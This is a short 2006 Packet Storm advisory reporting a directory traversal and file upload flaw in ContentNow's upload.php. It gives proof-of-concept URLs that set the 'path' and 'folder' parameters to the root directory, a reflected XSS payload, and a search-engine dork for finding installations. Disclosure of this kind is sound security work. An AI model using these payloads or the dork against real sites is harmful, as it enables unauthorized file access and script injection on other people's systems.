contentnow-130-2.txt

2006-11-14T00:00:00
ID PACKETSTORM:52029
Type packetstorm
Reporter Timq
Modified 2006-11-14T00:00:00

Description

                                        
                                            `ContentNow Directory Traversal(upload.php)  
------------------------------------------  
-vulnerability By: Timq   
-http://securitydb.org  
-Team Root-Shell  
-Email:timq[at]hushmail.com  
------------------------------------------  
It appears that it is possible to view any files on a system via 'upload.php'.  
Proper filtering not in affectfor the 'path' and 'folder' variables. You can also upload  
malicious files to where you have access through 'upload.php'.  
------------------------------------------  
~PoC  
------------------------------------------  
http://site.com/cn/upload.php?path=/  
http://site.com/cn/upload.php?folder=/  
XSS:  
http://site.com/cn/upload.php?path="><script>alert("xss")</script>  
D0rk:  
intitle:intitle:ContentNow   
------------------------------------------  
shouts:Warpboy,Zeusixsixsix,Stansar,Preddy,OG,PunkerX,Ethernet,str0ke,Gamma,Maggot  
everyone else  
------------------------------------------  
`